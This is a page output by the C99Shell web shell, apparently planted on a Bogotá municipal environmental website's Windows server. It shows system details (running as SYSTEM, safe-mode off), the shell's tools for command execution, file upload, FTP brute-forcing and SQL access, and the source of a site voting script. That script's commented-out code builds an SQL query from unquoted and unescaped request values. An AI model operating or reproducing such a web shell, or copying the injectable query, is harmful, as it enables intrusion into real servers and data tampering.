!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\Tomemos_Conciencia\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     votacionVoto.php (3.46 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../Connections/local.php'); ?>
<?php
/*session_start();
$now = date("Y-m-d H:i:s");
$voted = false;

if ($_SERVER['HTTP_REFERER'] == "") {
    $msg = "No puedes llamar este archivo por el mismo";
}

if (isset($_GET['id']) && isset($_GET['cat']) && ($_GET['id'] != '') && ($_GET['cat'] != '') ) {
    $temaID = $_GET['cat'] . '-' . $_GET['id'];
//    if (@$_SESSION[$temaID] == true) {
//        echo "Ya votaste por esta inscripciĆ³n";
//    }else{
        $_SESSION[$temaID] = true;
        $voted = true;
        $id = mysql_real_escape_string($_GET['id']);
        $cat = mysql_real_escape_string($_GET['cat']);
        $date_in = $now;
        $ip = $_SERVER['REMOTE_ADDR'];
        $agent = $_SERVER['HTTP_USER_AGENT'];

        $sql = "INSERT INTO votos SET id = $id, cat = '$cat', date_in = '$date_in', ip = '$ip', agent = '$agent';";

        mysql_select_db($database_local, $local);
        $votacion = mysql_query($sql, $local) or die(mysql_error());
        
        $msg = "Gracias por tu voto";

//    }
*/
}

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>O Tomamos Conciencia o No Tomamos Nada</title>
<style type="text/css">
<!--
body {
    margin-left: 0px;
    margin-top: 0px;
    background-image: url(Imagenes/fondo_02.jpg);
    background-repeat: repeat-x;
}
.Titulo {
    font-size: 15px;
    color: #1B75BB;
    font-weight: bold;
}
.text {
    font-size: 10pt;
    color: #1B75BB;
}
.Destacado1 {
    color: #1B75BB;
    font-weight: bold;
    font-size: 21px;
}
.Destacado2 {
    color: #1B75BB;
    font-size: 16px;
}
.Estilo2 {
    font-size: 15px;
    color: #1B75BB;
    font-weight: bold;
    font-family: Arial, Helvetica, sans-serif;
    text-align: center;
}
.Estilo5 {
    color: #1B75BB;
    font-weight: bold;
    font-size: 21px;
    font-family: Arial, Helvetica, sans-serif;
}
a:link {
    text-decoration: none;
    color: #1B75BB;
}
a:visited {
    text-decoration: none;
    color: #1B75BB;
}
a:hover {
    text-decoration: none;
    color: #1B75BB;
}
a:active {
    text-decoration: none;
    color: #1B75BB;
}
.Estilo7 {
    color: #1B75BB;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 10pt;
    font-weight: bold;
}
.msg {
    position:absolute;
    top:52px;
    left:98px;
    width: 199px;
    text-align:center;
}
-->
</style>
<script src="Scripts/swfobject_modified.js" type="text/javascript"></script>
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
</head>

<body class="Estilo5" onload="MM_preloadImages('Imagenes/boton_over_campaƱa.jpg')">
<div class="msg">
  <p>Votaciones cerradas</p>
  <p class="text"><a href="javascript:window.close();">Cerrar</a></p>
</div>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-10523892-15']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--